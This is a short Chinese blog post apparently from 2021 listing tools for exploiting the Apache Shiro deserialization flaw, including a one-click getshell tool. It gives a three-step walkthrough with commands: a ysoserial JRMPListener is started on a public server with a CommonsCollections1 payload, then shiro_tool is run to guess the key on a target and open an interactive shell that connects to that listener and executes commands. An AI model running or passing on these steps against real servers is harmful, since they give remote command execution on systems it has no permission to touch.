多种shiro利用方式总结

1、shiro反序列化漏洞综合利用工具

 

优点:图形化、傻瓜化工具,一键getshell

缺点:利用链少,回显方式少

 

 

2、ShiroExploit

 

基于ysoserial项目开发,payload多

 

3、ysoserial配合shiro_tool

 

 

ysoserial工具有多种payload

利用方式:

1、第一步

判断shiro利用链并在公网服务器起一个监听

java -cp ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections1 "ping xxxx.dnslog.cn"

2、第二步

使用shiro_tool

java -jar shiro_tool.jar url

自动判断key,成功后出现交互式shell,可输入监听ip:port

3、第三步

在第二步的交互式shell中输入第一步的ip和端口

成功后即可执行命令

 

posted @ 2021-10-25 11:29  r1ch4rd_L  阅读(1750)  评论(1编辑  收藏  举报